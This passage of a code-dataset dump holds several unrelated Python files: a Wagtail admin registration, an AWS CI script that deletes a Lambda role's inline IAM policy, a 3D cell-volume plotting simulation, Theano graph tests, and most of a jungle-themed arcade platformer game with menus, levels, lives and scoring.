CompanyPage\n menu_label = 'Companies'\n menu_icon = 'placeholder'\n add_to_settings_menu = False\n exclude_from_explorer = False\n list_display = ('title',)\n search_fields = ('title',)\n\n\nmodeladmin_register(PromotionAdmin)\nmodeladmin_register(ProductAdmin)\nmodeladmin_register(CompanyAdmin)","sub_path":"services/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"508858852","text":"import sys\nsys.path.insert(0, \"../..\")\n\nfrom payments_alpha_stack_env import policy_name, lambda_name\nfrom payments_alpha_common import iam_client\nfrom scripts.ci.add_sqs_policy_to_lambda_role import get_lambda_by_name, get_role_name_by_arn\n\n\ndef delete_policy(policy_name, role_name):\n iam_client.delete_role_policy(\n RoleName=role_name,\n PolicyName=policy_name\n )\n\n\ndef does_role_have_policy(policy_name, role_name):\n response = iam_client.list_role_policies(\n RoleName=role_name\n )\n for policy in response['PolicyNames']:\n if policy == policy_name:\n return True\n return False\n\n\ndef main():\n lambda_function = get_lambda_by_name(lambda_name)\n if lambda_function is not None:\n lambda_role_arn = lambda_function['Role']\n lambda_role_name = get_role_name_by_arn(lambda_role_arn)\n if does_role_have_policy(policy_name, lambda_role_name):\n delete_policy(policy_name, lambda_role_name)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"infrastructure/aws/scripts/ci/delete_lambda_policy.py","file_name":"delete_lambda_policy.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"522269969","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom plotly.offline import plot\n\n\nclass CellVolume():\n def __init__(self, vol_type, vol_size, offset=10, draw_dist=False):\n self.vol_type = vol_type\n self.vol_size = vol_size\n if self.vol_type == 'poisson':\n self.vol_grid = np.random.poisson(lam=offset, size=(self.vol_size, 3))\n elif self.vol_type == 'gaussian':\n self.vol_grid = np.random.normal(loc=offset, scale=1., size=(self.vol_size, 3))\n elif self.vol_type == 'exponential':\n self.vol_grid = np.random.exponential(scale=offset, size=(self.vol_size, 3))\n else:\n print('no suitable distribution')\n\n self.assignAxes()\n\n if draw_dist:\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(self.x, self.y, self.z)\n plt.show()\n\n self.createCells(fig)\n\n print('finish build volume')\n\n\n def assignAxes(self):\n '''\n distribute points on grid axes\n '''\n self.x = self.vol_grid[:,0]\n self.y = self.vol_grid[:,1]\n self.z = self.vol_grid[:,2]\n\n def createCells(self, fig):\n '''\n Iterate over every point in the grid and decide by a probability\n parameter whether this point will become a cell or not\n '''\n x_vol, y_vol, z_vol = self.x, self.y, self.z\n\n for i in range(self.vol_size):\n if self.decision(probability=0.1):\n print(i, self.vol_size, '---', self.x[i], self.y[i], self.z[i])\n diameter = 10\n\n val_x, val_y, val_z = self.x[i], self.y[i], self.z[i]\n u = np.linspace(0, 2 * np.pi, diameter)\n v = np.linspace(0, np.pi, diameter)\n x = diameter * np.outer(np.cos(u),np.sin(v)) + val_x\n y = diameter * np.outer(np.sin(u), np.sin(v)) + val_y\n z = diameter * np.outer(np.ones(np.size(u)), np.cos(v)) + val_z\n\n self.plot3Dgraph(fig, x, y, z)\n # self.drawBall(i, diameter=5)\n\n def decision(self, probability=0.1):\n return np.random.random() < probability\n\n # def drawBall(self, idx, diameter=5):\n # val_x, val_y, val_z = self.x[idx], self.y[idx], self.z[idx]\n # u = np.linspace(0, 2 * np.pi, diameter)\n # v = np.linspace(0, np.pi, diameter)\n # x = diameter * np.outer(np.cos(u),np.sin(v)) + val_x\n # y = diameter * np.outer(np.sin(u), np.sin(v)) + val_y\n # z = diameter * np.outer(np.ones(np.size(u)), np.cos(v)) + val_z\n\n\n def plot3Dgraph(self, fig, x, y, z):\n import plotly.graph_objs as go\n\n surface = go.Surface(x=x, y=y, z=z)\n data = go.Data([surface])\n\n layout = go.Layout(\n title='Parametric Plot',\n scene=go.Scene(\n xaxis=go.XAxis(\n gridcolor='rgb(255, 255, 255)',\n zerolinecolor='rgb(255, 255, 255)',\n showbackground=True,\n backgroundcolor='rgb(230, 230,230)'\n ),\n yaxis=go.YAxis(\n gridcolor='rgb(255, 255, 255)',\n zerolinecolor='rgb(255, 255, 255)',\n showbackground=True,\n backgroundcolor='rgb(230, 230,230)'\n ),\n zaxis=go.ZAxis(\n gridcolor='rgb(255, 255, 255)',\n zerolinecolor='rgb(255, 255, 255)',\n showbackground=True,\n backgroundcolor='rgb(230, 230,230)'\n )\n )\n )\n\n fig = go.Figure(data=data,layout=go.Layout(title='Offline Plotly Testing',\n width = 800,height = 500, xaxis = dict(title = 'X-axis'), yaxis = dict(title = 'Y-axis')))\n\n plot(fig,show_link = False)\n","sub_path":"scripts/simulate3DVol.py","file_name":"simulate3DVol.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"351122650","text":"from numpy.testing import assert_allclose\nfrom theano import tensor\nfrom theano.tensor.shared_randomstreams import RandomStreams\n\nfrom blocks.bricks import Brick\nfrom blocks.graph import apply_noise, ComputationGraph\nfrom tests.bricks.test_bricks import TestBrick\n\n\ndef test_application_graph_auxiliary_vars():\n X = tensor.matrix('X')\n Brick.lazy = True\n brick = TestBrick()\n Y = brick.access_application_call(X)\n graph = ComputationGraph(outputs=[Y])\n test_val_found = False\n for var in graph.variables:\n if var.name == 'test_val':\n test_val_found = True\n break\n assert test_val_found\n\n\ndef test_computation_graph():\n x = tensor.matrix('x')\n y = tensor.matrix('y')\n z = x + y\n a = z.copy()\n a.name = 'a'\n b = z.copy()\n b.name = 'b'\n r = tensor.matrix('r')\n\n cg = ComputationGraph([a, b])\n assert set(cg.inputs) == {x, y}\n assert set(cg.outputs) == {a, b}\n assert set(cg.variables) == {x, y, z, a, b}\n assert ComputationGraph(a).inputs == cg.inputs\n\n cg2 = cg.replace({z: r})\n assert set(cg2.inputs) == {r}\n assert set([v.name for v in cg2.outputs]) == {'a', 'b'}\n\n\ndef test_apply_noise():\n x = tensor.scalar()\n y = tensor.scalar()\n z = x + y\n\n cg = ComputationGraph([z])\n rng = RandomStreams(1)\n noised_cg = apply_noise(cg, [y], 1, rng)\n assert_allclose(noised_cg.outputs[0].eval({x: 1., y: 1.}),\n 2 + RandomStreams(1).normal().eval())\n","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"63087148","text":"from constants import *\nimport arcade, time\n\n\nBUTTONS = {\n 'big_left': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 10, SCREEN_HEIGHT / 9, \"arcade.close_window()\"],\n 'big_right': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 1.1, SCREEN_HEIGHT / 9, \"self.window.show_view(LevelSelect())\"],\n 'author': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 15, SCREEN_HEIGHT / 1.05, \"self.window.show_view(Author())\"],\n 'instruction': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 1.07, SCREEN_HEIGHT / 1.05, \"self.window.show_view(Instructions())\"],\n 'scores': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 1.2, SCREEN_HEIGHT / 1.05, \"self.window.show_view(ScoreTable())\"],\n 'first_level': [arcade.load_texture(\"images/HUD/hud1.png\"),\n SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.64],\n 'second_level': [arcade.load_texture(\"images/HUD/hud2.png\"),\n SCREEN_WIDTH / 1.2, SCREEN_HEIGHT / 1.5],\n 'escape_level': [arcade.load_texture(\"images/HUD/hudX.png\"),\n SCREEN_WIDTH / 6, SCREEN_HEIGHT / 2.5],\n 'menu': [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 10, SCREEN_HEIGHT / 9, \"self.window.show_view(GameMenu())\"]\n}\n\n\nclass GameMenu(arcade.View):\n def __init__(self):\n super().__init__()\n\n # sounds\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def on_draw(self):\n \"\"\" Draw the menu \"\"\"\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"images/game_menu.png\"))\n arcade.draw_text(\"JUNGLE ADVENTURE\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.3,\n arcade.color.ORANGE_PEEL, font_size=40, anchor_x=\"center\")\n self.draw_control_buttons()\n\n def draw_control_buttons(self):\n arcade.draw_scaled_texture_rectangle(BUTTONS['big_left'][1], BUTTONS['big_left'][2],\n BUTTONS['big_left'][0], scale=1.4)\n arcade.draw_scaled_texture_rectangle(BUTTONS['big_right'][1], BUTTONS['big_right'][2],\n BUTTONS['big_right'][0], scale=1.4)\n arcade.draw_text(\"EXIT\", SCREEN_WIDTH / 10, SCREEN_HEIGHT / 10,\n arcade.color.BLACK, font_size=20, anchor_x=\"center\")\n arcade.draw_text(\"SELECT LEVEL\", SCREEN_WIDTH / 1.1, SCREEN_HEIGHT / 10,\n arcade.color.BLACK, font_size=17, anchor_x=\"center\")\n\n arcade.draw_scaled_texture_rectangle(BUTTONS['author'][1], BUTTONS['author'][2],\n BUTTONS['author'][0], scale=0.7)\n arcade.draw_scaled_texture_rectangle(BUTTONS['instruction'][1], BUTTONS['instruction'][2],\n BUTTONS['instruction'][0], scale=0.7)\n arcade.draw_scaled_texture_rectangle(BUTTONS['scores'][1], BUTTONS['scores'][2],\n BUTTONS['scores'][0], scale=0.7)\n arcade.draw_text(\"?\", BUTTONS['instruction'][1], BUTTONS['instruction'][2] - 15,\n arcade.color.BLACK, font_size=25, anchor_x=\"center\")\n arcade.draw_text(\"Scores\", BUTTONS['scores'][1], BUTTONS['scores'][2] - 5,\n arcade.color.BLACK, font_size=10, anchor_x=\"center\")\n arcade.draw_text(\"A\", BUTTONS['author'][1], BUTTONS['author'][2] - 15,\n arcade.color.BLACK, font_size=25, anchor_x=\"center\")\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n button_list = [BUTTONS['big_left'], BUTTONS['big_right'],\n BUTTONS['instruction'], BUTTONS['scores'], BUTTONS['author']]\n self.eval_button(x, y, button_list)\n arcade.play_sound(self.menu_select)\n\n def eval_button(self, x, y, button_list):\n for i in button_list:\n texture = i[0]\n w = i[1]\n h = i[2]\n if w - texture.width // 2 <= x <= w + texture.width // 2:\n if h - texture.height // 2 <= y <= h + texture.height // 2:\n eval(i[3])\n\n\nclass LevelSelect(arcade.View):\n def __init__(self):\n super().__init__()\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def on_draw(self):\n \"\"\" Draw the menu \"\"\"\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"images/level_select.png\"))\n arcade.draw_text(\"SELECT THE LEVEL\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.3,\n arcade.color.BLACK, font_size=30, anchor_x=\"center\")\n\n arcade.draw_scaled_texture_rectangle(BUTTONS['first_level'][1], BUTTONS['first_level'][2],\n BUTTONS['first_level'][0], scale=0.7)\n arcade.draw_scaled_texture_rectangle(BUTTONS['second_level'][1], BUTTONS['second_level'][2],\n BUTTONS['second_level'][0], scale=0.7)\n arcade.draw_scaled_texture_rectangle(BUTTONS['escape_level'][1], BUTTONS['escape_level'][2],\n BUTTONS['escape_level'][0], scale=0.7)\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.play_sound(self.menu_select)\n button_list = [BUTTONS['first_level'], BUTTONS['second_level'], BUTTONS['escape_level']]\n for i in button_list:\n texture = i[0]\n w = i[1]\n h = i[2]\n if w - texture.width // 2 <= x <= w + texture.width // 2:\n if h - texture.height // 2 <= y <= h + texture.height // 2:\n if i == BUTTONS['first_level']:\n game_view = MyGame()\n game_view.setup()\n self.window.show_view(game_view)\n elif i == BUTTONS['second_level']:\n game_view = MyGame()\n game_view.level = 2\n game_view.setup()\n self.window.show_view(game_view)\n elif i == BUTTONS['escape_level']:\n self.window.show_view(GameMenu())\n\n\nclass Instructions(arcade.View):\n def __init__(self):\n super().__init__()\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def on_draw(self):\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n arcade.draw_text(\"INSTRUCTION\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.2, arcade.color.BLACK, font_size=50,\n anchor_x=\"center\")\n\n arcade.draw_text(\"Collect coins and find the exit!\", SCREEN_WIDTH / 2,\n SCREEN_HEIGHT / 1.5, arcade.color.ORANGE_PEEL, font_size=50,\n anchor_x=\"center\")\n arcade.draw_text(\"Use arrow keys to run and space bar for jump.\\n\\n\"\n \"Press P to pause the game\",\n SCREEN_WIDTH / 2, SCREEN_HEIGHT / 2.3, arcade.color.BLACK, font_size=30, anchor_x=\"center\")\n\n draw_menu_button()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.play_sound(self.menu_select)\n button_list = [BUTTONS['menu']]\n GameMenu().eval_button(x, y, button_list)\n\n\ndef draw_menu_button():\n arcade.draw_scaled_texture_rectangle(BUTTONS['menu'][1], BUTTONS['menu'][2],\n BUTTONS['menu'][0], scale=1.4)\n arcade.draw_text(\"MENU\",\n SCREEN_WIDTH / 15.5, SCREEN_HEIGHT / 9.5, arcade.color.BLACK, font_size=20, align=\"right\")\n\n\nclass Author(arcade.View):\n def __init__(self):\n super().__init__()\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def on_draw(self):\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"images/author.png\"))\n arcade.draw_text(\"ABOUT AUTHOR\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.2, arcade.color.ORANGE_PEEL, font_size=50,\n anchor_x=\"center\")\n arcade.draw_text(\"Math student \\n\"\n \"who was used to play \\n platform games a lot.\\n\\n\"\n \"Enjoy the game!\",\n SCREEN_WIDTH / 3.1, SCREEN_HEIGHT / 2.4, arcade.color.LIGHT_CYAN, font_size=30,\n anchor_x=\"center\")\n draw_menu_button()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.play_sound(self.menu_select)\n button_list = [BUTTONS['menu']]\n GameMenu().eval_button(x, y, button_list)\n\n\nclass ScoreTable(arcade.View):\n def __init__(self):\n super().__init__()\n self.menu_select = arcade.load_sound(\"sounds/menu_selection_click.wav\")\n\n def show_table(self):\n arcade.draw_text(\"LATEST SCORE\", SCREEN_WIDTH / 2, SCREEN_HEIGHT / 1.3,\n arcade.color.BLACK, font_size=30, anchor_x=\"center\")\n t = open('scores.txt', 'r')\n table = t.readlines()\n for i in table:\n arcade.draw_text(i, SCREEN_WIDTH / 4, SCREEN_HEIGHT / 1.5,\n arcade.color.BLACK, font_size=30, anchor_x=\"center\")\n\n def on_draw(self):\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,\n arcade.load_texture(\"png_ground/BG/BG.png\"))\n self.show_table()\n draw_menu_button()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.play_sound(self.menu_select)\n button_list = [BUTTONS['menu']]\n GameMenu().eval_button(x, y, button_list)\n\n\nclass MyGame(arcade.View):\n \"\"\"\n Main application class.\n \"\"\"\n\n def __init__(self):\n\n # Call the parent class and set up the window\n super().__init__()\n\n # Sprite lists\n self.player_list = None\n self.wall_list = None\n self.coin_list = None\n self.background = None\n self.foreground = None\n self.goal = None\n self.moving = None\n self.pins = None\n\n # Set up the player\n self.player_sprite = None\n\n # Add physics engine\n self.physics_engine = None\n\n # self.back = None\n arcade.set_background_color(arcade.csscolor.CORNFLOWER_BLUE)\n self.end_of_map = 0\n self.view_left = 0\n self.view_bottom = 0\n self.score = 0\n self.level = 1\n self.life = 3\n\n # sounds\n self.coin_sound = arcade.load_sound(\":resources:sounds/coin5.wav\")\n self.jump_sound = arcade.load_sound(\":resources:sounds/jump3.wav\")\n self.lost_life_sound = arcade.load_sound(\":resources:sounds/hit4.wav\")\n self.finish_level_sound = arcade.load_sound(\":resources:sounds/upgrade1.wav\")\n self.game_over_sound = arcade.load_sound(\"sounds/error.wav\")\n self.game_creature = arcade.load_sound(\"sounds/game_creature.wav\")\n self.current_player = None\n self.music = None\n\n def play_song(self):\n # stop currently playing\n if self.music:\n self.music.stop(self.current_player)\n\n # play next song\n self.music = arcade.Sound(\"sounds/childish_theme.WAV\", streaming=True)\n self.current_player = self.music.play(volume=0.1, loop=True)\n time.sleep(0.03)\n\n def setup(self):\n \"\"\" Set up the game here. Call this function to restart the game. \"\"\"\n # Reset the viewport\n self.view_left = 0\n self.view_bottom = 0\n\n self.player_list = arcade.SpriteList()\n self.player_sprite = self.create_player_sprite()\n arcade.play_sound(self.game_creature)\n self.player_list.append(self.player_sprite)\n\n # add map to game\n my_map = arcade.tilemap.read_tmx(f\"my_map{self.level}.tmx\")\n self.background = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"background\", scaling=0.7)\n self.wall_list = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"ground\", scaling=0.7)\n self.pins = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"don'touch\", scaling=0.7)\n self.goal = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"goal\", scaling=0.7)\n self.foreground = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"foreground\", scaling=0.7)\n self.moving = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"moving-platform\", scaling=0.7)\n self.coin_list = arcade.tilemap.process_layer(map_object=my_map, layer_name=\"collectable\", scaling=0.7)\n\n for sprite in self.moving:\n self.wall_list.append(sprite)\n\n self.end_of_map = my_map.map_size.width\n self.map_width = (my_map.map_size.width - 1) * my_map.tile_size.width\n\n self.physics_engine = arcade.PhysicsEnginePlatformer(self.player_sprite, self.wall_list, GRAVITY)\n\n # Setup music\n self.play_song()\n\n # Move the player sprite back to the beginning\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n\n def create_player_sprite(self) -> arcade.AnimatedWalkingSprite:\n \"\"\"Creates the animated player sprite\n\n Returns:\n The properly set up player sprite\n \"\"\"\n # Where are the player images stored?\n texture_path = \":resources:images/animated_characters/female_adventurer/\"\n\n # Set up the appropriate textures\n walking_paths = [texture_path + f\"femaleAdventurer_walk{x}.png\" for x in range(0, 7)]\n standing_path = texture_path + \"femaleAdventurer_idle.png\"\n jumping_path = texture_path + \"femaleAdventurer_jump.png\"\n\n # Load them all now\n walking_right_textures = [arcade.load_texture(texture) for texture in walking_paths]\n walking_left_textures = [arcade.load_texture(texture, mirrored=True) for texture in walking_paths]\n\n standing_right_textures = [arcade.load_texture(standing_path)]\n standing_left_textures = [arcade.load_texture(standing_path, mirrored=True)]\n\n jumping_right_textures = [arcade.load_texture(jumping_path)]\n jumping_left_textures = [arcade.load_texture(jumping_path, mirrored=True)]\n\n # Create the sprite\n player = arcade.AnimatedWalkingSprite()\n\n # Add the proper textures\n player.stand_left_textures = standing_left_textures\n player.stand_right_textures = standing_right_textures\n player.walk_left_textures = walking_left_textures\n player.walk_right_textures = walking_right_textures\n player.jumping_right_textures = jumping_right_textures\n player.jumping_left_textures = jumping_left_textures\n\n # Move the player sprite back to the beginning\n player.center_x = PLAYER_START_X\n player.center_y = PLAYER_START_Y\n player.state = arcade.FACE_RIGHT\n\n # Set the initial texture\n player.texture = player.stand_right_textures[0]\n\n return player\n\n def scroll_viewport(self) -> None:\n \"\"\"Scrolls the viewport when the player gets close to the edges\"\"\"\n change_viewport = False\n # Scroll left\n # Find the current left boundary\n left_boundary = self.view_left + LEFT_VIEWPORT_MARGIN\n\n # Are we to the left of this boundary? Then we should scroll left.\n if self.player_sprite.left < left_boundary:\n self.view_left -= left_boundary - self.player_sprite.left\n change_viewport = True\n # But don't scroll past the left edge of the map\n if self.view_left < 0:\n self.view_left = 0\n\n # Scroll right\n # Find the current right boundary\n right_boundary = self.view_left + SCREEN_WIDTH - RIGHT_VIEWPORT_MARGIN\n\n # Are we to the right of this boundary? Then we should scroll right.\n if self.player_sprite.right > right_boundary:\n self.view_left += self.player_sprite.right - right_boundary\n change_viewport = True\n # Don't scroll past the right edge of the map\n if self.view_left > self.map_width - SCREEN_WIDTH:\n self.view_left = self.map_width - SCREEN_WIDTH\n\n self.view_bottom = int(self.view_bottom)\n self.view_left = int(self.view_left)\n\n # Do the scrolling\n if change_viewport:\n arcade.set_viewport(\n left=self.view_left,\n right=SCREEN_WIDTH + self.view_left,\n bottom=self.view_bottom,\n top=SCREEN_HEIGHT + self.view_bottom,\n )\n\n def draw_life_counter(self):\n life = self.life\n life_table = [150, 200, 250]\n if life == 3:\n for l in life_table:\n arcade.draw_texture_rectangle(l + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_full.png\"))\n elif life == 2:\n for l in life_table[:-1]:\n arcade.draw_texture_rectangle(l + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_full.png\"))\n arcade.draw_texture_rectangle(life_table[2] + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_empty.png\"))\n elif life == 1:\n arcade.draw_texture_rectangle(life_table[0] + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_full.png\"))\n for l in life_table[1:]:\n arcade.draw_texture_rectangle(l + self.view_left, 570 + self.view_bottom,\n SCREEN_WIDTH / 20, SCREEN_HEIGHT / 15,\n arcade.load_texture(\"images/HUD/hudHeart_empty.png\"))\n\n def on_draw(self):\n \"\"\" Render the screen. \"\"\"\n\n arcade.start_render()\n self.background.draw()\n self.wall_list.draw()\n self.pins.draw()\n self.goal.draw()\n self.coin_list.draw()\n self.player_list.draw()\n self.foreground.draw()\n score_text = f\"Score: {self.score}\"\n level_text = f\"Level: {self.level}\"\n arcade.draw_text(level_text, start_x=10 + self.view_left, start_y=570 + self.view_bottom,\n color=arcade.csscolor.DARK_ORANGE, font_size=20)\n arcade.draw_text(score_text, start_x=10 + self.view_left,\n start_y=540 + self.view_bottom, color=arcade.csscolor.GOLD, font_size=20)\n self.draw_life_counter()\n\n def on_key_press(self, key, modifiers):\n \"\"\" Called whenever the user presses a key. \"\"\"\n if key == arcade.key.LEFT:\n self.player_sprite.change_x = -MOVEMENT_SPEED\n elif key == arcade.key.RIGHT:\n self.player_sprite.change_x = MOVEMENT_SPEED\n elif key == arcade.key.SPACE:\n if self.physics_engine.can_jump():\n self.player_sprite.change_y = PLAYER_JUMP_SPEED\n arcade.play_sound(self.jump_sound)\n elif key == arcade.key.P:\n pause = PauseView(self)\n self.window.show_view(pause)\n\n def on_key_release(self, key, modifiers):\n \"\"\"Called when the user releases a key. \"\"\"\n if key == arcade.key.LEFT:\n self.player_sprite.change_x = 0\n elif key == arcade.key.RIGHT:\n self.player_sprite.change_x = 0\n\n def update(self, delta_time):\n \"\"\" Movement and game logic \"\"\"\n\n # Move the player with the physics engine\n self.physics_engine.update()\n\n if self.player_sprite.center_y < -100:\n self.life_check()\n\n self.scroll_viewport()\n self.player_sprite.update_animation(delta_time)\n self.wall_list.update()\n\n for wall in self.wall_list:\n if wall.boundary_right and wall.right > wall.boundary_right and wall.change_x > 0:\n wall.change_x *= -1\n elif wall.boundary_left and wall.left < wall.boundary_left and wall.change_x < 0:\n wall.change_x *= -1\n elif wall.boundary_top and wall.top > wall.boundary_top and wall.change_y > 0:\n wall.change_y *= -1\n elif wall.boundary_bottom and wall.bottom < wall.boundary_bottom and wall.change_y < 0:\n wall.change_y *= -1\n\n collected_coins = arcade.check_for_collision_with_list(\n sprite=self.player_sprite, sprite_list=self.coin_list\n )\n\n for coin in collected_coins:\n # Add the coin score to our score\n self.score += 1\n arcade.play_sound(self.coin_sound)\n coin.remove_from_sprite_lists()\n\n goals_hit = arcade.check_for_collision_with_list(\n sprite=self.player_sprite, sprite_list=self.goal\n )\n\n if goals_hit:\n bravo = Congrats(self)\n self.window.show_view(bravo)\n if self.music:\n self.music.stop(self.current_player)\n arcade.play_sound(self.finish_level_sound)\n\n if arcade.check_for_collision_with_list(self.player_sprite, self.pins):\n self.life_check()\n\n def return_to_start(self):\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n self.view_left = 0\n self.view_bottom = 0\n self.play_song()\n\n def life_check(self):\n if self.life >= 2:\n self.life -= 1\n self.draw_life_counter()\n arcade.play_sound(self.lost_life_sound)\n self.return_to_start()\n elif self.life == 1:\n self.window.show_view((GameOver(self)))\n if self.music:\n self.music.stop(self.current_player)\n arcade.play_sound(self.game_over_sound)\n\n\n def update_score(self):\n f = open('scores.txt', 'w')\n f.write(\"Level: \" + str(self.level) + \" score: \" + str(self.score))\n f.close()\n\n\nclass PauseView(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n self.fill_color = arcade.make_transparent_color(arcade.color.WHITE, transparency=80)\n\n def on_draw(self):\n self.game_view.on_draw()\n arcade.draw_lrtb_rectangle_filled(\n left=self.game_view.view_left,\n right=self.game_view.view_left + SCREEN_WIDTH,\n top=self.game_view.view_bottom + SCREEN_HEIGHT,\n bottom=self.game_view.view_bottom,\n color=self.fill_color,\n )\n arcade.draw_text(\"PAUSED\", self.game_view.view_left + 100, self.game_view.view_bottom + 400,\n arcade.color.RED_ORANGE, font_size=40, align=\"center\")\n arcade.draw_text(\"PRESS P TO RESUME\", self.game_view.view_left + 100, self.game_view.view_bottom + 300,\n arcade.color.YELLOW_ROSE, font_size=20, align=\"right\")\n self.draw_menu_gameplay()\n\n def draw_menu_gameplay(self):\n arcade.draw_scaled_texture_rectangle(self.game_view.view_left + 80, self.game_view.view_bottom + 67,\n arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"), scale=1.4)\n arcade.draw_text(\"MENU\", self.game_view.view_left + 50, self.game_view.view_bottom + 60,\n arcade.color.BLACK, font_size=20, align=\"center\")\n\n def eval_menu_gameplay(self, x, y):\n button_list = [arcade.load_texture(\"images/HUD/hudJewel_yellow.png\"),\n SCREEN_WIDTH / 10, SCREEN_HEIGHT / 9,\n \"self.window.show_view(GameMenu())\"]\n texture = button_list[0]\n if button_list[1] - texture.width // 2 <= x <= button_list[1] + texture.width // 2:\n if button_list[2] - texture.height // 2 <= y <= button_list[2] + texture.height // 2:\n eval(button_list[3])\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n self.eval_menu_gameplay(x, y)\n if self.game_view.music:\n self.game_view.music.stop(self.game_view.current_player)\n\n def on_key_press(self, key, _modifiers):\n if key == arcade.key.P:\n self.window.show_view(self.game_view)\n\n\nclass GameOver(arcade.View):\n def __init__(self, game_view):\n super().__init__()\n self.game_view = game_view\n self.fill_color = arcade.make_transparent_color(arcade.color.WHITE, transparency=90)\n\n def on_draw(self):\n \"\"\" Draw the menu \"\"\"\n arcade.start_render()\n arcade.draw_lrwh_rectangle_textured(\n bottom_left_x=self.game_view.view_left,\n bottom_left_y=self.game_view.view_bottom,\n width=SCREEN_WIDTH,\n height=SCREEN_HEIGHT,\n texture=arcade.load_texture(\"images/JWDLx5AZBtI.jpg\"),\n alpha=200)\n arcade.draw_scaled_texture_rectangle(self.game_view.view_left + 400, self.game_view.view_bottom + 150,\n arcade.load_texture(\"images/Tiles/lockRed.png\"), scale=1.4)\n arcade.draw_text(\"GAME OVER\", self.game_view.view_left + 400, self.game_view.view_bottom + 400,\n arcade.color.BLACK, font_size=50, anchor_x=\"center\")\n arcade.draw_text(\"PRESS ENTER TO REPLAY\", self.game_view.view_left + 400, self.game_view.view_bottom + 300,\n arcade.color.ORANGE_PEEL, font_size=30, anchor_x=\"center\")\n PauseView(self.game_view).draw_menu_gameplay()\n self.game_view.update_score()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n arcade.set_viewport(left=0, right=SCREEN_WIDTH, bottom=0, top=SCREEN_HEIGHT)\n PauseView(self.game_view).eval_menu_gameplay(x, y)\n\n def on_key_press(self, key, _modifiers):\n if key == arcade.key.ENTER:\n self.game_view.player_sprite.change_x = 